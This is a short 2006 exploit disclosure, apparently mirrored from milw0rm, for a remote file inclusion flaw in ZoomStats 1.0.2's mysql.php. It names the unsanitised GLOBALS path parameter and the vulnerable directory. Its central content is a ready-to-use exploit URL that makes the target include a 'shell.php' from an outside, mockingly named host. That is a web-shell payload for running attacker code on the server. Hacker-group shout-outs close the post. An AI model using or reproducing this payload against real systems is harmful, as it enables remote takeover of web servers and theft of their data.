Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:14410
HistorySep 25, 2006 - 12:00 a.m.

ZoomStats <= 1.0.2 (mysql.php) Remote File Include Vulnerability

2006-09-2500:00:00
vulners.com
44
ToXiC

#BuG FounD by Drago84

#Application Affect:ZoomStats
#Source Code:
#http://prdownloads.sourceforge.net/zoomstats/ZoomStats-v1.0.2.zip?use_mirror=kent
#Problem:
#$GLOBALS['lib']['db']['path'] array not declare
#Solution : $GLOBALS['lib']['db']['path']
#Page Vulnerable : mysql.php
#Dir Page: /libs/dbmax/

Exempe Of ExPloit is:

#http://www.site.com/zoomstats/libs/dbmax/mysql.php?GLOBALS['lib']['db']['path']=http://marcusbestlamer.gay/shell.php?
#GrEatZ All Member of ToXiC, Str0ke

ToXic Security

ToXiC ###Drago84###############

milw0rm.com [2006-09-24]